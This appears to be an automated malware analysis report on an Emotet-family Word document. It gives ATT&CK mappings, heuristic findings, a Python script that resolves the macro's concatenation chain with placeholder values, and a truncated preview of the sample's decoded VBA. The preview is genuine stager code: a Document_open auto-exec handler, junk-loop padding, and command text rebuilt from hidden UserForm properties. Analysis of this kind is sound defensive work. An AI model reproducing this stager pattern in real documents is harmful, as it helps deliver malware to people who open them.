Verdict: MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic (VBA macro with a Document_Open auto-exec handler)
T1566.001 Phishing: Spearphishing Attachment (the delivery vector associated with Emotet maldocs; inferred from the family, not observable in the file itself)
T1140 Deobfuscate/Decode Files or Information (command text rebuilt at runtime from UserForm control and property values)
The sample carries VBA macros with a Document_open auto-exec handler (VBA identifiers are case-insensitive, so it fires as Document_Open), a pattern consistent with Emotet maldocs. The extracted source confirms the stager shape the heuristics describe: the ThisDocument module Kyrevpin declares an MSForms TextBox named Qjniafsohtzkw through its VB_Control attribute, and the function Ajueafukppsix rebuilds a string by concatenating that control with members of the UserForm module Jsbkraxy (Kioicuxkupknt, Ecclogdoh, Gqemglefkb, Zdvhlzvvtqot, Dmgujvpeglnv) before wrapping the result in Muclacme on both sides. The repeated For ... = Jqhopfvk To 0 loops of CDbl/Tan arithmetic on never-assigned variables are filler meant to dilute signature matching. Combined with the CreateObject and GetObject hits, this is a downloader that assembles and executes a command to fetch a second-stage payload; the command text itself cannot be recovered from the source preview alone, because the control and property values live in the form streams rather than in the module code. ClamAV names the file Doc.Downloader.Emotet-7458423-1.
Heuristics (8)
| Finding | Severity | Rule ID | Description |
|---|---|---|---|
| ClamAV: Doc.Downloader.Emotet-7458423-1 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Downloader.Emotet-7458423-1 |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (5 related findings) |
| VBA UserForm hidden-property command stager | critical | OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER | VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive. |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open handler present; the macro runs automatically when the document is opened with macros enabled |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call (instantiates a COM object from a ProgID) |
| GetObject call | high | OLE_VBA_GETOBJ | GetObject call (retrieves a COM object by moniker or file path) |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. |

URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier that Office writes into ordinary documents; it is not a download location and should not be treated as an indicator.
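The stager finding above says the command text is reconstructed from UserForm members at runtime. The following script is an added example for this report (it is not the analyzer's code and not code from the sample) that re-implements the analyst's side of that step on decoded VBA source: it follows the chain of + / & concatenations visible in the extracted macros.bas (Glvgiorl, then Qcxkvwdlvty, then Ovrexuwvzbhqc, then Ajueafukppsix) and substitutes the control and property values an analyst has pulled from the form streams. The identifiers are the sample's; the property values in FORM_VALUES are constructed placeholders, because the real form contents are not part of the source preview. It also counts the filler statements so the padding ratio can be reported alongside the reconstruction.

```python
"""Resolve the UserForm-property concatenation chain of a macro stager.

Added example; not the analyzer's code and not code from the sample.
Identifiers are taken from the extracted macros.bas; the property VALUES in
FORM_VALUES are constructed placeholders (hypothetical), since the real
TextBox/UserForm contents live in the form streams, not in the source preview.
"""
import re
from typing import Dict, Tuple

# lhs = rhs, where rhs is whatever follows the first '='.
ASSIGN_RE = re.compile(r"^\s*(?P<lhs>[A-Za-z_]\w*)\s*=\s*(?P<rhs>.+?)\s*$")
# A bare identifier or Module.Member reference (e.g. Jsbkraxy.Kioicuxkupknt).
IDENT_RE = re.compile(r"^(?:[A-Za-z_]\w*\.)?[A-Za-z_]\w*$")
# Filler of the kind padding this sample: unused Dims, 'For ... To 0' loops,
# and arithmetic on never-assigned variables (xPI, CDbl(3), Tan(x), 4 - x).
JUNK_RE = re.compile(
    r"^\s*(?:Dim\b|For\b|Next\b|\w+\s*=\s*(?:xPI\b|CDbl\(|Tan\(|\(?\d+\s*-\s*\w+\)?))"
)
# Attribute lines, Sub/Function headers, End lines and blanks are not statements.
SKIP_RE = re.compile(r"^\s*(?:Attribute\b|(?:Private\s+|Public\s+)?(?:Sub|Function)\b|End\b|$)")

# Constructed excerpt of the extracted Ajueafukppsix function (one junk loop kept).
SAMPLE_SOURCE = """\
Function Ajueafukppsix()
Dim Dwqunlcvs
For Yyvkiorife = Jqhopfvk To 0
Ttbepqzuql = xPI
Tqosxcdkvf = CDbl(3)
Qrmesgampzw = Tan(MyeW5A)
Mplthtnylqsz = 4 - Cacqnxmnxd
Next
Glvgiorl = Kyrevpin.Qjniafsohtzkw
Qcxkvwdlvty = Glvgiorl + Jsbkraxy.Kioicuxkupknt + Jsbkraxy.Ecclogdoh + Jsbkraxy.Gqemglefkb
Ovrexuwvzbhqc = Qcxkvwdlvty + Jsbkraxy.Zdvhlzvvtqot + Jsbkraxy.Dmgujvpeglnv
Ajueafukppsix = Muclacme + Ovrexuwvzbhqc + Muclacme
End Function
"""

# Constructed placeholder values (hypothetical). In a real case these are the
# TextBox text on ThisDocument and the UserForm control/property strings.
FORM_VALUES: Dict[str, str] = {
    "Kyrevpin.Qjniafsohtzkw": "seg-A ",
    "Jsbkraxy.Kioicuxkupknt": "seg-B ",
    "Jsbkraxy.Ecclogdoh": "seg-C ",
    "Jsbkraxy.Gqemglefkb": "seg-D ",
    "Jsbkraxy.Zdvhlzvvtqot": "seg-E ",
    "Jsbkraxy.Dmgujvpeglnv": "seg-F",
}


def resolve_stager(vba_source: str, form_values: Dict[str, str], target: str) -> str:
    """Forward-propagate pure concatenation assignments and return `target`'s value.

    Only assignments whose right-hand side is identifiers/properties joined by
    '+' or '&' are evaluated; junk arithmetic and calls are skipped. A name that
    is never assigned is VBA Empty, and Empty concatenated with a String yields
    the String, so unknown operands such as Muclacme contribute "".
    """
    env: Dict[str, str] = dict(form_values)
    for line in vba_source.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        terms = [t.strip() for t in re.split(r"[+&]", m.group("rhs"))]
        if not all(IDENT_RE.match(t) for t in terms):
            continue
        env[m.group("lhs")] = "".join(env.get(t, "") for t in terms)
    return env.get(target, "")


def junk_statistics(vba_source: str) -> Tuple[int, int]:
    """Return (filler_statements, total_statements) as a padding indicator."""
    junk = total = 0
    for line in vba_source.splitlines():
        if SKIP_RE.match(line):
            continue
        total += 1
        if JUNK_RE.match(line):
            junk += 1
    return junk, total


if __name__ == "__main__":
    print("reconstructed:", resolve_stager(SAMPLE_SOURCE, FORM_VALUES, "Ajueafukppsix"))
    junk, total = junk_statistics(SAMPLE_SOURCE)
    print(f"filler statements: {junk}/{total}")
```

With the placeholder values the chain resolves to "seg-A seg-B seg-C seg-D seg-E seg-F", and 7 of the 11 statements in the excerpt are filler. On the real sample, FORM_VALUES would be populated from the strings olevba reports out of the form streams; the resolver handles only + / & concatenation, so a variant that splits a property on a delimiter and Joins it back (the Split/Join shape named in the rule) needs an extra step before the same propagation applies.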
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8109 bytes | e13371cb7926e0cce954e6257119a1bdb1c8a38254c6235468f7edc93492b3e3 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Kyrevpin"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Qjniafsohtzkw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Gpjxzqvhp
Dim Fbppzklof
For Jbqaevsyqnuod = Jqhopfvk To 0
Yfoouubdlcld = xPI
Ustzgfigymaor = CDbl(3)
Lnmbhmgzrmf = Tan(MyeW5A)
Exsrtcwvaowij = 4 - Bngdbmzpz
Joscmbxkcbuj = (3 - Dwlyptxuzyd)
Glfispbs = Xcvkzpfh
Oxqorkivop = CDbl(6)
Fzryxtbttwwto = Tan(Ixftqzvnivqq)
Next
Dim Khrcephzhfyg
Dim Mqfybxwryui
For Xcvhxjkoe = Jqhopfvk To 0
Tvcnqzcrc = xPI
Afcvqxsjwu = CDbl(3)
Jxlyaxychy = Tan(MyeW5A)
Fuibysrlm = 4 - Pfcsnvvv
Ltqebbte = (3 - Cgwpvork)
Exvwvtxe = Mclctaswx
Hvkzjimwydksk = CDbl(6)
Xtiieotjpzv = Tan(Uwummewblxmkk)
Next
Dim Ecafkuwwyx
Dim Awmjkyoabvneh
For Linexvvf = Jqhopfvk To 0
Zkhuucvq = xPI
Lsyavjyi = CDbl(3)
Wxsulnltede = Tan(MyeW5A)
Fkohfhssnoqpt = 4 - Inxnvbhcrmi
Cmpwtwsqhct = (3 - Xijbesdykqg)
Uyiwuwabpbzuv = Xblelfeytqhq
Rvjfxcuhkhwa = CDbl(6)
Hjhjwlbjf = Tan(Qpzogmgxi)
Next
Hcdtgxkcthnf
End Sub
Attribute VB_Name = "Jsbkraxy"
Attribute VB_Base = "0{830EAA7A-1B71-4277-B4AB-3EF880367575}{DD105773-569D-4B16-B191-C6B4AFEA6D1F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Lguhsipfaag"
Function Ajueafukppsix()
Dim Dwqunlcvs
Dim Fqclqftqect
For Yyvkiorife = Jqhopfvk To 0
Ttbepqzuql = xPI
Tqosxcdkvf = CDbl(3)
Qrmesgampzw = Tan(MyeW5A)
Mplthtnylqsz = 4 - Cacqnxmnxd
Jlnuuucb = (3 - Sqomiqfaueu)
Lmiioeyrhyfjc = Wxwxaoimcbp
Xjqhonbhll = CDbl(6)
Nvlsicfeoewhw = Tan(Daggyipuyi)
Next
Glvgiorl = Kyrevpin.Qjniafsohtzkw
Dim Rbrxawdabkv
Dim Iemdgitxw
For Ovufakqa = Jqhopfvk To 0
Uzpkrrlriaonn = xPI
Oycgqqvgni = CDbl(3)
Xzruumjn = Tan(MyeW5A)
Toqignvobhfvm = 4 - Ubfzsbbmpor
Ubebereop = (3 - Hlzhywbnfg)
Dnmurcbupw = Zcdrvgzetvsh
Nsmemztqansw = CDbl(6)
Nnulwehwtk = Tan(Gvqivfrxpihkk)
Next
Qcxkvwdlvty = Glvgiorl + Jsbkraxy.Kioicuxkupknt + Jsbkraxy.Ecclogdoh + Jsbkraxy.Gqemglefkb
Dim Yvalekapl
Dim Zaaslpipywaoo
For Vkuxvthytqz = Jqhopfvk To 0
Uuylprti = xPI
Dvudmjxh = CDbl(3)
Rpqvnkfsc = Tan(MyeW5A)
Lkgvexoy = 4 - Fujqcbqvpv
Ykeddyfmbft = (3 - Knhhljjpvmug)
Joxnmtymvq = Qskkzbmyrnin
Zxcykwynvx = CDbl(6)
Hdsyrrgqsqfl = Tan(Uguvfjjzubjx)
Next
Ovrexuwvzbhqc = Qcxkvwdlvty + Jsbkraxy.Zdvhlzvvtqot + Jsbkraxy.Dmgujvpeglnv
Dim Rrqrbdqma
Dim Vjuanewyu
For Lmxwhzacwkh = Jqhopfvk To 0
Koturumlcgitm = xPI
Zsaqcefdt = CDbl(3)
Rlyaxogwpzlch = Tan(MyeW5A)
Bigpduvucekr = 4 - Flzpudancitm
Hnqsqjcwxeb = (3 - Rvwnxfbkommn)
Ogxvqehmpnra = Inunshjrgvwh
Tbdfusoq = CDbl(6)
Lxnfgivwoj = Tan(Ryuoiwac)
Next
Ajueafukppsix = Muclacme + Ovrexuwvzbhqc + Muclacme
Dim Kffoulmvin
Dim Kpbtitdwkknt
For Pmmiryxnpi = Jqhopfvk To 0
Wqmtbddgft = xPI
Knblcarml = CDbl(3)
Aiawqvwztlvwn = Tan(MyeW5A)
Jkpvhvlhxdx = 4 - Pqvbptmlah
Ititpqoblq = (3 - Qabpbcssjlkcq)
Txfjcckyb = Imjkayizkos
Xoucxjgdvj = CDbl(6)
Fhftfbzm = Tan(Gjykltrjsaav)
Next
End Function
Function H
```
... (truncated)